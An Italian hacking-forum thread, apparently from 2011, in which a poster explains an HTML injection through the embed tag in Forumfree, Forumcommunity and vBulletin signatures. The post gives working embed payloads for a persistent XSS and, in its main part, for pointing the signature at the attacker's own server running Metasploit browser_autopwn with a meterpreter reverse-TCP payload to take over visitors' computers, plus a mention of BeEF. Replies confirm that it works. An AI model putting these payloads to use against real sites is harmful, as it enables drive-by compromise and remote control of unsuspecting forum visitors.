Author Topic: Forumfree, Forumcommunity e Vbulletin BUG  (Read 9786 times)

Bl4k3

  • Guest
on: June 07, 2011, 12:16:43 AM
Forumfree & Forumcommunity HTML CODE INJECTION

0x0 Html Code Injection
0x1 Permanent XSS in Forumcommunity & Forumfree
0x2 Sfruttare il Code Injection per arrivare ad un browser autopwn
0x3 Altri metodi di Exploitazione


0x0

Navigando per forumfree e forumcommunity mi sono accorto che tra i settings del profilo (più precisamente nella parte FIRMA)
è consentito l'utilizzo di <embed allowNetworking="internal" allowScriptAccess="never" src="" height=0 width=1> , che permette
la visualizzazione di immagine e di video all'interno della board. Quindi un attaccher può tranquillamente caricare del codice
remoto all'interno della board.

0x1

A questo punto proviamo una semplice permanent XSS.
Allora carichiamo un file html contente un semplice <script>alert('_XSS_')</script> in un nostro server. Io ho usato
http://hcevolution.netsons.org/smf/alert.html
Ci rechiamo nel Control Panel --> Edit Signature e immettiamo questo codice all'interno
<embed allowNetworking="internal" allowScriptAccess="never" src="http://hcevolution.netsons.org/smf/ _alert.html" height=0 width=1>
e quando andremo a visitare il nostro profilo ci uscirà un bellissimo alert con scritto XSS!
Finché non toglieremo il codice dalla firma la XSS rimarrà permanente.

0x2

Ma di una semplice XSS che c'è ne facciamo?..Ben poco direte!
Non è meglio un browser autopwn così che quando una qualsiasi persona visiterà il nostro profilo verrà infettata ed avremmo il controllo
remoto del suo pc?...CERTO! Cheesy
Quindi apriamo metasploit ed utilizzeremo l'auxiliary [server/browser_autopwn] e come payload [windows/meterpreter/reverse_tcp].*
Una volta compilato andremo a injettare nella firma il seguente codice:
<embed allowNetworking="internal" allowScriptAccess="never" src="http://nostroip:8080" height=0 width=1>.
Fatto ciò quando una qualsiasi persona visiterà il nostro profilo si attiverà il nostro auxiliary.
Se la vittima naviga con un browser buggato avremo il controllo remoto! Cheesy

0x3

Un altro modo per ricavare una shell remota è quello di utilizzare il tool BEEF.
Per chi volesse informazioni riguardanti questo tool può visitare la pagina http://www.bindshell.net/tools/beef.html.

P.S:Il tutto deve essere fatto da google-chrome , internet exporer!
P.S.S:Versione Testata di Vbulletin 4.0.1


Bl4k3
« Last Edit: February 03, 2012, 09:05:44 PM by raffaele »



Emilio

  • Newbie
  • *
  • Posts: 35
    • View Profile
Reply #1 on: June 07, 2011, 10:10:22 AM
Lòl provata e funzionante. Complimenti per l'advisory : D



clshack

  • Full Member
  • ***
  • Posts: 177
    • View Profile
    • ClsHack | Blog
Reply #2 on: June 07, 2011, 10:51:56 AM
Grande :D



Bl4k3

  • Guest
Reply #3 on: June 07, 2011, 11:25:52 AM
Grazie mille , ho avvisato del bug! :)



SYSTEM_OVERIDE

  • Guest
Reply #4 on: June 07, 2011, 01:20:22 PM
Bl4k3 ma questo bug non te lo avevo detto io ?    :-\



Bl4k3

  • Guest
Reply #5 on: June 07, 2011, 01:23:11 PM
ah propio no ;)



SYSTEM_OVERIDE

  • Guest
Reply #6 on: June 07, 2011, 01:40:50 PM
ah propio no ;)

Ho la conversazione di quando ti dico che c'è una falla su ff .-.
Vabè passiamo oltre, tanto non l'avrei neanche pubblicata xD